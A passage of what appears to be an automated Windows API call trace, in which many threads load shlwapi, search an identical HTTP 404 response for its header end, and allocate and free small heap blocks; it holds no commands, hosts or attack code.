Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0271.873] GetProcessHeap () returned 0x690000 [0271.873] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0271.873] GetProcessHeap () returned 0x690000 [0271.873] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0271.873] GetProcessHeap () returned 0x690000 [0271.873] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 384 os_tid = 0x15ec [0272.097] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0272.098] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:17 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0272.098] GetProcessHeap () returned 0x690000 [0272.098] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0272.098] GetProcessHeap () returned 0x690000 [0272.098] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0272.098] GetProcessHeap () returned 0x690000 [0272.099] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 385 os_tid = 0x15f0 [0272.435] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0272.435] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:17 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0272.435] GetProcessHeap () returned 0x690000 [0272.435] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0272.436] GetProcessHeap () returned 0x690000 [0272.436] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0272.436] GetProcessHeap () returned 0x690000 [0272.436] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 386 os_tid = 0x15f4 [0272.858] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0272.888] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:18 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0272.888] GetProcessHeap () returned 0x690000 [0272.888] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0272.888] GetProcessHeap () returned 0x690000 [0272.888] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0272.888] GetProcessHeap () returned 0x690000 [0272.889] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 387 os_tid = 0x15f8 [0273.862] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0273.862] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:18 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0273.862] GetProcessHeap () returned 0x690000 [0273.862] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0273.862] GetProcessHeap () returned 0x690000 [0273.862] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0273.863] GetProcessHeap () returned 0x690000 [0273.863] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 388 os_tid = 0x15fc [0274.080] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0274.081] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:19 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0274.081] GetProcessHeap () returned 0x690000 [0274.081] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0274.081] GetProcessHeap () returned 0x690000 [0274.081] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0274.081] GetProcessHeap () returned 0x690000 [0274.081] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 389 os_tid = 0x1600 [0274.259] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0274.306] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:19 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0274.312] GetProcessHeap () returned 0x690000 [0274.312] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0274.312] GetProcessHeap () returned 0x690000 [0274.312] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0274.312] GetProcessHeap () returned 0x690000 [0274.313] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 390 os_tid = 0x1604 [0274.560] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0274.561] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:19 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0274.561] GetProcessHeap () returned 0x690000 [0274.561] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0274.561] GetProcessHeap () returned 0x690000 [0274.561] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0274.561] GetProcessHeap () returned 0x690000 [0274.561] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 391 os_tid = 0x160c [0274.796] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0274.796] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:20 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0274.796] GetProcessHeap () returned 0x690000 [0274.796] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0274.796] GetProcessHeap () returned 0x690000 [0274.796] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0274.796] GetProcessHeap () returned 0x690000 [0274.797] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 392 os_tid = 0x1610 [0275.033] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0275.033] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:20 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0275.033] GetProcessHeap () returned 0x690000 [0275.033] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0275.033] GetProcessHeap () returned 0x690000 [0275.033] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0275.033] GetProcessHeap () returned 0x690000 [0275.034] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 393 os_tid = 0x1614 [0275.300] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0275.301] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:20 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0275.301] GetProcessHeap () returned 0x690000 [0275.301] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0275.301] GetProcessHeap () returned 0x690000 [0275.301] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0275.301] GetProcessHeap () returned 0x690000 [0275.301] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 394 os_tid = 0x1618 [0275.493] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0275.493] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:20 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0275.494] GetProcessHeap () returned 0x690000 [0275.494] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0275.494] GetProcessHeap () returned 0x690000 [0275.494] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0275.494] GetProcessHeap () returned 0x690000 [0275.494] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 395 os_tid = 0x161c [0275.697] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0275.698] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:20 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0275.698] GetProcessHeap () returned 0x690000 [0275.698] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0275.698] GetProcessHeap () returned 0x690000 [0275.698] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0275.698] GetProcessHeap () returned 0x690000 [0275.698] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 396 os_tid = 0x1620 [0275.879] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0275.880] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:21 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0275.880] GetProcessHeap () returned 0x690000 [0275.880] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0275.881] GetProcessHeap () returned 0x690000 [0275.881] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0275.881] GetProcessHeap () returned 0x690000 [0275.881] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 397 os_tid = 0x1624 [0276.108] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0276.109] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:21 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0276.109] GetProcessHeap () returned 0x690000 [0276.109] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0276.109] GetProcessHeap () returned 0x690000 [0276.109] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0276.109] GetProcessHeap () returned 0x690000 [0276.110] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 398 os_tid = 0x1628 [0276.269] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0276.293] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:21 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0276.293] GetProcessHeap () returned 0x690000 [0276.293] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0276.293] GetProcessHeap () returned 0x690000 [0276.293] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0276.294] GetProcessHeap () returned 0x690000 [0276.294] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 399 os_tid = 0x162c [0276.534] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0276.534] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:21 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0276.534] GetProcessHeap () returned 0x690000 [0276.534] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0276.534] GetProcessHeap () returned 0x690000 [0276.534] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0276.534] GetProcessHeap () returned 0x690000 [0276.535] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 400 os_tid = 0x1630 [0276.766] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0276.766] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:22 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0276.766] GetProcessHeap () returned 0x690000 [0276.766] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0276.766] GetProcessHeap () returned 0x690000 [0276.766] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0276.766] GetProcessHeap () returned 0x690000 [0276.767] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 401 os_tid = 0x1634 [0276.973] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0276.973] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:22 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0276.973] GetProcessHeap () returned 0x690000 [0276.973] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0276.973] GetProcessHeap () returned 0x690000 [0276.973] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0276.973] GetProcessHeap () returned 0x690000 [0276.974] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 402 os_tid = 0x163c [0277.246] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0277.247] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:22 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0277.247] GetProcessHeap () returned 0x690000 [0277.247] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0277.247] GetProcessHeap () returned 0x690000 [0277.247] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0277.247] GetProcessHeap () returned 0x690000 [0277.248] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 403 os_tid = 0x1640 [0277.455] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0277.455] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:22 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0277.455] GetProcessHeap () returned 0x690000 [0277.455] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0277.455] GetProcessHeap () returned 0x690000 [0277.455] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0277.455] GetProcessHeap () returned 0x690000 [0277.456] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 404 os_tid = 0x1644 [0277.615] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0277.615] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:22 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0277.615] GetProcessHeap () returned 0x690000 [0277.615] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0277.615] GetProcessHeap () returned 0x690000 [0277.616] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0277.616] GetProcessHeap () returned 0x690000 [0277.616] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 405 os_tid = 0x1648 [0277.783] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0277.783] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:23 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0277.783] GetProcessHeap () returned 0x690000 [0277.783] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0277.783] GetProcessHeap () returned 0x690000 [0277.783] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0277.783] GetProcessHeap () returned 0x690000 [0277.784] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 406 os_tid = 0x164c [0277.962] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0277.962] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:23 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0278.003] GetProcessHeap () returned 0x690000 [0278.003] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0278.003] GetProcessHeap () returned 0x690000 [0278.003] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0278.003] GetProcessHeap () returned 0x690000 [0278.004] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 407 os_tid = 0x1650 [0278.253] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0278.253] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:23 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0278.253] GetProcessHeap () returned 0x690000 [0278.253] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0278.253] GetProcessHeap () returned 0x690000 [0278.253] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0278.253] GetProcessHeap () returned 0x690000 [0278.254] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 408 os_tid = 0x1654 [0278.428] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0278.429] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:23 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0278.429] GetProcessHeap () returned 0x690000 [0278.429] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0278.429] GetProcessHeap () returned 0x690000 [0278.429] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0278.429] GetProcessHeap () returned 0x690000 [0278.429] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 409 os_tid = 0x1658 [0278.604] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0278.654] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:23 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0278.654] GetProcessHeap () returned 0x690000 [0278.654] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0278.654] GetProcessHeap () returned 0x690000 [0278.654] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0278.654] GetProcessHeap () returned 0x690000 [0278.654] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 410 os_tid = 0x165c [0278.813] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0278.845] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:24 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0278.845] GetProcessHeap () returned 0x690000 [0278.845] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0278.845] GetProcessHeap () returned 0x690000 [0278.845] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0278.845] GetProcessHeap () returned 0x690000 [0278.845] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 411 os_tid = 0x1660 [0279.002] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0279.022] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:24 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0279.022] GetProcessHeap () returned 0x690000 [0279.022] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0279.022] GetProcessHeap () returned 0x690000 [0279.022] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0279.022] GetProcessHeap () returned 0x690000 [0279.022] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 412 os_tid = 0x1664 [0279.250] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0279.251] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:24 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0279.251] GetProcessHeap () returned 0x690000 [0279.251] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0279.251] GetProcessHeap () returned 0x690000 [0279.251] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0279.251] GetProcessHeap () returned 0x690000 [0279.251] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 413 os_tid = 0x1668 [0279.890] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0279.890] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:24 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0279.890] GetProcessHeap () returned 0x690000 [0279.890] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0279.890] GetProcessHeap () returned 0x690000 [0279.890] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0279.890] GetProcessHeap () returned 0x690000 [0279.891] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 414 os_tid = 0x166c [0280.502] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0280.515] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:25 